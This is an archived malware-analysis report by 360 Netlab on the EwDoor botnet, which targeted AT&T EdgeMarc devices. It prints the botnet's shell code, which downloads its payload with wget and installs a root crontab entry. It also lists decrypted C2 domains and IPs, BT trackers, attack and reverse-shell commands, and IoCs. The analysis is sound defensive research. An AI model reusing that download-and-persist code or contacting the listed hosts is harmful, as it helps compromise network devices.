{
	"id": "d04f4c5b-1c63-4d3f-8e7d-1841cf88e684",
	"created_at": "2026-04-06T00:14:21.335984Z",
	"updated_at": "2026-04-10T03:21:53.89723Z",
	"deleted_at": null,
	"sha1_hash": "90970a7da47302f944f26454baea0aec5169336d",
	"title": "EwDoor Botnet Is Attacking AT\u0026T Customers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1663000,
	"plain_text": "EwDoor Botnet Is Attacking AT\u0026T Customers\r\nBy Alex.Turing\r\nPublished: 2021-11-30 · Archived: 2026-04-05 17:36:49 UTC\r\nBackground\r\nOn October 27, 2021, our Botmon system identified an attacker attacking Edgewater Networks' devices via CVE-2017-6079 with a relatively unique mount file system command in its payload, which caught our attention. After analysis, we confirmed that this was a brand new botnet, and based on its targeting of Edgewater products and its Backdoor feature, we named it EwDoor.\r\nThe initial version of EwDoor used a multi-C2 redundancy mechanism, and we registered the second C2 domain, iunno.se, which gave us the opportunity to measure its size. Unfortunately, EwDoor reconfigured its communication model after experiencing problems with the failure of the main C2 network, using BT trackers to deliver C2s, and in turn we lost sight of EwDoor. However, during this brief observation, we confirmed that the attacked devices were EdgeMarc Enterprise Session Border Controllers belonging to the telecom company AT\u0026T, and that all 5.7k active victims that we saw during the short time window were geographically located in the US.\r\nSo far, the EwDoor in our view has undergone 3 versions of updates, and its main functions can be summarized into 2 main categories: DDoS attacks and Backdoor. 
Since the attacked devices are related to telephone communication, we presume that its main purpose is DDoS attacks and the gathering of sensitive information, such as call logs.\r\nGiven the size and activity of EwDoor, and the sensitivity of the infected devices, we decided to write this paper to share our findings with the community.\r\nTimeline\r\nOctober 27, 2021, first capture of EwDoor, version number 0.12.0, main features are DDoS Attack, File Manager, Reverse Shell, Port Scan, etc.\r\nNovember 8, 2021, EwDoor was updated to version number 0.15.0, moving C2 from local to cloud, using BT Trackers.\r\nNovember 15, 2021, EwDoor was updated to version 0.16.0, minor update, adding sandbox confrontation features.\r\nNovember 20, 2021, EwDoor was updated to version 0.16.0, minor update, adding more BT Trackers.\r\nEwDoor Overview\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 1 of 21\n\nWe have captured a total of 3 versions of EwDoor. Taking version 0.16.0 as a blueprint, we can characterize EwDoor as a botnet that receives its C2 through BT trackers, uses TLS to protect traffic, and mainly profits by means of DDoS attacks and sensitive data theft; it currently propagates through the Nday vulnerability CVE-2017-6079, mainly targeting EdgeMarc Enterprise Session Border Controller devices.\r\nIt currently supports 6 major functions:\r\nSelf updating\r\nPort scanning\r\nFile management\r\nDDoS attack\r\nReverse SHELL\r\nExecute arbitrary commands\r\nIts basic logic is shown below.\r\nSize\r\nBy grabbing the author's unregistered C2 domain name, we were able to measure the size of this botnet for a little while, when the number of active bot IPs was around 5.7k. The AS numbers of the infected device IPs were all AS7018|AT\u0026T_Services,_Inc. (AT\u0026T, an American telecom company). 
By back-checking the SSL certificates used by these devices, we found that there were about 100k IPs using the same SSL certificate. We are not sure how many of the devices corresponding to these IPs could be infected, but we can speculate that, as they belong to the same class of devices, the possible impact is real.\r\nShell script analysis\r\nEwDoor's SHELL script is quite long, so we extracted the key parts for analysis.\r\nsetup_ramdisk() {\r\n    # create a 4 MB image file, overwrite it with the decompressed image and mount it\r\n    dd if=/dev/zero of=$RAMDISK bs=4096k count=1\r\n    gunzip -c $IMAGE \u003e $RAMDISK\r\n    mkdir -p $MOUNT\r\n    mount $RAMDISK $MOUNT\r\n}\r\ndownload_update() {\r\n    # stop the running bot, then fetch the new image from the URL passed as $1\r\n    killall -9 ewstat\r\n    sleep $[ ( $RANDOM % 10 ) + 1 ]\r\n    rm -f $IMAGE\r\n    rm -f $EW_BIN\r\n    wget -O $IMAGE $1\r\n    grep \"$EW_BIN\" /etc/config/crontab \u003e/dev/null 2\u003e\u00261\r\n    # is it not already in the crontab?\r\n    if [ $? != 0 ]; then\r\n        echo \"* * * * * root $EW_BIN \u003e/dev/null 2\u003e\u00261 \u0026\" \u003e\u003e /etc/config/crontab\r\n    fi\r\n    sleep 1\r\n    cfg_commit\r\n}\r\nIt can be seen that the main functions of the SHELL script are:\r\nDownload and execute EwDoor samples\r\nSet up Crontab for persistence\r\nIt is also worth mentioning that EwDoor samples are stored in gzip form on the download server, which to a certain extent escapes security detection for binary files; the authors of earlier versions made the sample files into Linux rev 1.0 ext2 filesystem files and then used mount to mount the files on the system, which is probably another trick to protect itself.\r\nSample Analysis\r\nThe latest version, 0.16, was chosen as the main object of analysis, and its basic information is shown below.\r\nMD5:7d4937e27d0fd75dd6159ffe53ebb505\r\nELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked, interpreter 
/lib/ld-uClibc.so.0, s\r\nPacker:none\r\nVersion: 0.16.0\r\nEwdoor uses dynamic linking, and although it adopts some anti-reverse techniques, there is not much difficulty in reversing it. In general, its functionality is relatively simple. When it runs on the infected device, it first collects device information, then performs some common tasks such as single instance, persistence and other functions; then it decrypts the BT tracker and obtains C2 by accessing the BT tracker; finally it reports the collected device information to C2 and executes the commands issued by C2.\r\nNow let’s analyze the implementation of EwDoor one by one from 3 aspects: safeguards, host behavior and network communication.\r\nSafeguards\r\nThe TLS protocol is used at the network level to prevent communication from being intercepted.\r\nSensitive resources are encrypted to make it more difficult to reverse.\r\nC2 has moved from local to \"cloud\" and is sent by BT tracker to prevent direct extraction by IOC systems.\r\nThe \"ABIFLAGS\" PHT in the ELF is modified to counter qemu-user and some higher kernel versions of the Linux sandbox. This is a relatively rare countermeasure, which shows that the author of EwDoor is very familiar with the Linux kernel, QEMU, and Edgewater devices.\r\nThe following error is generated when actually running a simulation with qemu-user.\r\nwrite(2, \"/tmp/echuysqs: Invalid PT_MIPS_ABIFLAGS entry\\n\", 46)\r\nHost behavior\r\nWhen Ewdoor runs, it will check the file name and parameters. 
When the file name is \"/var/tmp/.mnt/ewupdate\", it means that this is an update operation, and it will copy itself to ewstat with the command cp -f /var/tmp/.mnt/ewupdate /var/tmp/.mnt/ewstat and then start execution; when there are no start parameters, or the first start parameter is not \"script\", then the /etc/config/ew.conf script is executed via bash; only when the first start parameter is \"script\" is the processing logic below executed, which is in a way also a countermeasure against sandboxes/simulators.\r\nSingle instance\r\nEwdoor implements single instance by means of a file lock, as shown below.\r\nWe can use /proc/locks to observe the process and its corresponding lock file; if we then execute EwDoor again, we can see that no new process is created.\r\nCollecting device information\r\nEwdoor collects the hostname, NIC address, etc. of the compromised device for use later in the registration process.\r\nPersistence\r\nEwdoor periodically terminates the netflash process in the system with the following code. The netflash command is a maintenance command used to update the system remotely. EwDoor achieves persistence by blocking this maintenance channel and then working together with the crontab set up by the SHELL script.\r\nNetwork communication\r\nEwdoor stores the encrypted network-related sensitive resources, such as registration information, C2, ports, etc. in the sample. 
Therefore, when bots want to communicate with C2, they have to decrypt this part of the resources first, then get the C2 either directly or indirectly, and finally establish communication with the C2 and wait for the execution of the commands issued by the C2.\r\nDecryption\r\nEwdoor uses 3 tables to describe the encrypted resources: a ciphertext table, a ciphertext length table and a combination table. The ciphertext \u0026 ciphertext length tables describe the encrypted resource itself, while the combination table describes how the resources are used in combination. The ciphertext table and ciphertext length table can decrypt the BT domain, BT port and other information, while the combination table combines BT domain \u0026 port into a BT tracker.\r\nEwDoor decrypts sensitive information by using the \"gstr\" function, which is implemented as follows.\r\nAfter reverse analysis, we wrote the following IDA script, through which we can decrypt all the resource information.\r\n# -*- coding: utf-8 -*-\r\n# tested in ida 7.0, only for md5 7d4937e27d0fd75dd6159ffe53ebb505\r\nimport idc\r\npbuf_base=0x00467014   # table of pointers to the ciphertext buffers\r\nplen_base=0x00455A14   # table of ciphertext lengths, terminated by a 0 entry\r\nkey=\"холодно в доме папа в тужурке мама дочуркою топит в печурке!\"\r\ncnt=0\r\nwhile idc.get_wide_dword(plen_base)!=0:\r\n    plain=''\r\n    blen=idc.get_wide_dword(plen_base)\r\n    pbuf=idc.get_wide_dword(pbuf_base)\r\n    buf=idc.get_bytes(pbuf,blen)\r\n    # each ciphertext byte is XORed with the item index and the repeating key\r\n    for i in range(blen):\r\n        tmp=chr(ord(buf[i])^cnt^ord(key[i % len(key)]))\r\n        plain+=tmp\r\n    print(plain)\r\n    plen_base+=4\r\n    pbuf_base+=4\r\n    cnt+=1\r\n    if cnt\u003e=62:\r\n        break\r\nThere are 62 items of encrypted resources, and the first 22 items after decryption are as follows.\r\nindex item\r\n0 OrOib2zCIWa10v2bunJ\r\n1 6969\r\n2 53\r\n3 1337\r\n4 80\r\n5 451\r\n6 2770\r\n7 16661\r\n8 2710\r\n9 2960\r\n10 3391\r\n11 tracker.birkenwald.de\r\n12 ipv6.tracker.zerobytes.xyz\r\n13 fe.dealclub.de\r\n14 wassermann.online\r\n15 mail.realliferpg.de\r\n16 movies.zsw.ca\r\n17 tracker.blacksparrowmedia.net\r\n18 code2chicken.nl\r\n19 abufinzio.monocul.us\r\n20 tracker.0x.tf\r\n21 tracker.altrosky.nl\r\nThe combination table built into the sample is shown below.\r\nThe combination table is grouped by 2 items and combined in order, i.e., table item 11 is combined with table item 1, table item 12 is combined with table item 7, and so on. The combinations [11, 1] and [12, 7] give the addresses of 2 BT trackers, \"tracker.birkenwald.de:6969\" and \"ipv6.tracker.zerobytes.xyz:16661\" respectively.\r\nGetting C2\r\nEwDoor gets C2 in different ways in different versions. In version 0.12.0, the direct method is used, while in 0.15 and 0.16, the indirect method is used.\r\nDirect method\r\nAfter the above decryption process, bots directly get the C2. Take sample 5d653e9a5b1093ef8408c3884fbd9217 as an example; the following IDA script decrypts all of its encrypted resources.\r\n# tested in ida 7.0, only for md5 5d653e9a5b1093ef8408c3884fbd9217\r\nimport idc\r\npbuf_base=0x00467814   # table of pointers to the ciphertext buffers\r\nplen_base=0x00456100   # table of ciphertext lengths, terminated by a 0 entry\r\nkey=\"TheMagicalMysteryTourIsComingToTakeYouAway!\"\r\ncnt=0\r\nwhile idc.get_wide_dword(plen_base)!=0:\r\n    plain=''\r\n    blen=idc.get_wide_dword(plen_base)\r\n    pbuf=idc.get_wide_dword(pbuf_base)\r\n    buf=idc.get_bytes(pbuf,blen)\r\n    # same scheme as above: XOR with the item index and the repeating key\r\n    for i in range(blen):\r\n        tmp=chr(ord(buf[i])^cnt^ord(key[i % len(key)]))\r\n        plain+=tmp\r\n    print(plain)\r\n    plen_base+=4\r\n    pbuf_base+=4\r\n    cnt+=1\r\n    if cnt\u003e=18:\r\n        break\r\nThe decrypted resources are shown in the following table; table entries 1 to 14 are C2s, table entries 15 to 17 are ports.\r\nIndex Item\r\n0 F0JEAADWS4kQFj7iPOQyjA\r\n1 185.10.68.20\r\n2 rtmxvd.iunno.se\r\n3 ekgmua.zapto.org\r\n4 boatreviews.xpresit.net\r\n5 a.rtmxvdio.net\r\n6 a.hatbowlu3hf.ru\r\n7 a.hatbowlrtx.su\r\n8 45.141.157.217\r\n9 rtmxvd.iunno.se\r\n10 hhqnyy.zapto.org\r\n11 besthatsite.mooo.com\r\n12 b.rtmxvdio.net\r\n13 b.hatbowlu3hf.ru\r\n14 b.hatbowlrtx.su\r\n15 13433\r\n16 443\r\n17 53\r\nIndirect method\r\nIn the so-called indirect method, after the above decryption process yields the BT tracker, a specific request to the BT tracker has to be made to get the C2. This process uses two functions, \"bt_generate_daily_hash_and_port\" and \"bt_try_find_good_peers\": the former is used to get the C2 port, the latter to get the C2 IP.\r\nThe implementation of the bt_generate_daily_hash_and_port function is shown below. The specific logic is to format the current time as \"%d%m%Y\", append it to \"1HAT2BWL\", calculate the SHA1 value of this string, and then derive the C2 port from the last 2 bytes of the SHA1.\r\nIn fact, the port calculated in the above step is not the real port value; 10 needs to be added. The process is shown in the figure below.\r\nThe implementation of the bt_try_find_good_peers function is shown below. The specific logic is to send the above SHA1 value as the infohash to the BT tracker, and get C2:PORT pairs through the Tracker UDP protocol. 
If the PORT is equal to the above port value, then this IP is the IP of the C2.\r\nThe following figure shows the network traffic generated on 2021.11.22 as an example.\r\nThe red part is the SHA1 value of the string \"1HAT2BWL22112021\", the last 2 bytes of which are 0x23a2, and the port \"0xc6fc\" of C2 is obtained by the following code operation.\r\n# last two bytes of SHA1(\"1HAT2BWL22112021\")\r\nsha18=0x23\r\nsha19=0xa2\r\ndef tohex(val, nbits):\r\n    # render a possibly negative value as an unsigned nbits-wide hex string\r\n    return hex((val + (1 \u003c\u003c nbits)) % (1 \u003c\u003c nbits))\r\n# only the low nibble of the first byte is used, and 10 is added to the result\r\nport=sha19+((sha18\u00260xf)\u003c\u003c8)-15536+10\r\nprint(tohex(port,16))   # 0xc6fc\r\nThe SHA1 value calculated above is sent to the BT tracker as the infohash, and the server ports returned by the BT tracker are then compared; we can see that there are 3 groups whose port is 0xc6fc, and any of them can be chosen to establish communication.\r\n2d 8d 9b d9 : c6fc -\u003e 45.141.155.217:50940\r\n3e 4d 9c 67 : c6fc -\u003e 62.77.156.103:50940\r\nd4 c0 f1 9e : c6fc -\u003e 212.192.241.158:50940\r\nThe actual network connection is as follows:\r\nCommunication with C2\r\nWhen Ewdoor successfully obtains the C2, it first establishes a connection through the TLS protocol, then sends the registration information to C2, and finally waits for the execution of the commands sent by C2. In this process, according to the different versions, the communication protocols with C2 can be divided into the following two major categories.\r\n0.12 version protocol\r\n0x01: TLS connection\r\nThe TLS connection itself is not worth talking about, but the interesting point is that in version 0.12, the author of EwDoor made a mistake.\r\nAs shown in the figure below, in version 0.12, Ewdoor decrypted the C2 and called \"resolving_and_connect_first\" to establish a connection with C2. 
The values of the parameters a1 and a2 are taken from res_range, and a2\u003e=a1 is required for the process of resolving and connecting to run. Sample 5d653e9a5b1093ef8408c3884fbd9217 has a1=8, a2=7, which creates a bug that causes the C2s numbered 8 to 14 to never be connected; however, the Ewdoor authors quickly realized the bug, and it was fixed in sample 6c553db88e4cd52a2ed4795ec1710421.\r\n0x02: Registration\r\nThe following code constructs the registration packet, which includes the decrypted string from index 0, the version number, the device host name, the device NIC address and other information.\r\nThe actual traffic generated is shown below.\r\n00000000 48 45 4c 4f 20 30 2e 31 32 2e 30 20 46 30 4a 45 |HELO 0.12.0 F0JE|\r\n00000010 41 41 44 57 53 34 6b 51 46 6a 37 69 50 4f 51 79 |AADWS4kQFj7iPOQy|\r\n00000020 6a 41 20 64 65 62 69 61 6e 2d 6d 69 70 73 20 31 |jA debian-mips 1|\r\n00000030 32 33 34 35 36 0a |23456.|\r\n0x03: Supported commands\r\nAfter successful registration with C2, Ewdoor waits for the execution of commands issued by C2. The commands supported by version 0.12 are shown in the following table.\r\ncmd purpose\r\nuf udp flood\r\nsf syn flood\r\ncat exec \"cat\" cmd\r\nping heartbeat\r\nexec run cmd via bash\r\nexec2 run cmd via popen\r\npscan port scan\r\nuname exec \"uname\" cmd\r\nupdate write \"/tmp/.ewupdate\"\r\nreverse reverse shell\r\ndownload download file via wget\r\n0.15\u00260.16 version protocol\r\n0x01: TLS connection\r\nNothing special here.\r\n0x02: Registration\r\nThe following code is used to construct the registration packet. 
The data includes the decrypted string from index 0, the version number, the device host name, the device NIC address and other information.\r\nThe actual traffic generated is shown below.\r\n00000000 00 3b 00 00 00 00 00 00 00 00 02 00 06 30 2e 31 |.;...........0.1|\r\n00000010 36 2e 30 00 13 4f 72 4f 69 62 32 7a 43 49 57 61 |6.0..OrOib2zCIWa|\r\n00000020 31 30 76 32 62 75 6e 4a 00 0b 64 65 62 69 61 6e |10v2bunJ..debian|\r\n00000030 2d 6d 69 70 73 00 06 31 32 33 34 35 36 |-mips..123456|\r\n0000003d\r\n0x03: Command signature verification\r\nAfter successful registration, Ewdoor waits for C2 to issue an instruction, which consists of 4 parts: \"len (2 bytes) + Signature (512 bytes) + sessionid (8 bytes) + cmd\". When receiving an instruction, Ewdoor verifies it with the proto_verify_signature function. By doing this, Ewdoor ensures that the whole network remains fully controllable by its operator and cannot be hijacked by others.\r\nThe pubkey is encrypted and stored in the sample, which is 550 bytes in total, and the real public key can be obtained after the 0x2a\r\nTake the payload received in practice as an example; it can be divided into 4 parts according to the format described above.\r\nThe above payload can be easily verified with the pk_verify tool that comes with mbedtls.\r\n\u003emd5 pubkey\r\n9dba72160f5d02ebdc8a78bcb27defa *pubkey\r\n\u003emd5 msg\r\n5a6d3b1018b5e7543ee6f73d6c9df727 *msg\r\n\u003emd5 msg.sig\r\n10acc6e0e0447d900d6d46c66c8f4406 *msg.sig\r\n\u003ecat msg | hexdump -C\r\n00000000 00 00 00 00 00 00 01 07 01\r\n\u003epk_verify.exe pubkey msg\r\n. Reading public key from 'pubkey'\r\n. Verifying the SHA-256 signature\r\n. 
OK (the signature is valid)\r\nWhen the command passes the check, the specific command is executed; here the command number is 1, which is the heartbeat command.\r\n0x04: Supported commands\r\nThe commands supported by versions 0.15 and 0.16 are shown in the following table.\r\ncmd index purpose\r\n1 heartbeat\r\n2 port scan\r\n4 exec \"uname\" cmd\r\n5 download file via wget\r\n6 update, write \"/var/tmp/.ewupdate\"\r\n7 run cmd via bash\r\n8 run cmd via popen\r\n9 ddos attack\r\nMiscellaneous\r\nThe author of Ewdoor is a little bit of a bug fixer!\r\nIt took the author only 16 minutes to fix the aforementioned C2 bug in version 0.12.\r\neef0035f971622cc5f48e164ca28a95f; gzip compressed data, was \"ramdisk.img\", from Unix, last modified: Wed\r\nfbbacfb20e487265c7fdb30817717f26; gzip compressed data, was \"ramdisk.img\", from Unix, last modified: Wed\r\nFrom the XOR keys to the actor profile.\r\nThe first used key, \"TheMagicalMysteryTourIsComingToTakeYouAway!\", is from The Beatles.\r\nThe second used key is \"холодно в доме папа в тужурке мама дочуркою топит в печурке!\". According to Google Translate, it is \"It’s cold in the house, dad in a jacket, mom drowns her daughter in the stove!\", kinda creepy!\r\nThe note from the author\r\nAfter finding our honeypot IP in November, he called us out in the payload, as can be seen below.\r\nReaders are always welcome to reach us on Twitter or to email us at netlab at 360 dot cn.\r\nIoC\r\nC2\r\nport: 53, 
443, 13433\r\nDownloader\r\nSample MD5\r\nSource: https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/"
	],
	"report_names": [
		"warning-ewdoor-botnet-is-attacking-att-customers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434461,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/90970a7da47302f944f26454baea0aec5169336d.pdf",
		"text": "https://archive.orkl.eu/90970a7da47302f944f26454baea0aec5169336d.txt",
		"img": "https://archive.orkl.eu/90970a7da47302f944f26454baea0aec5169336d.jpg"
	}
}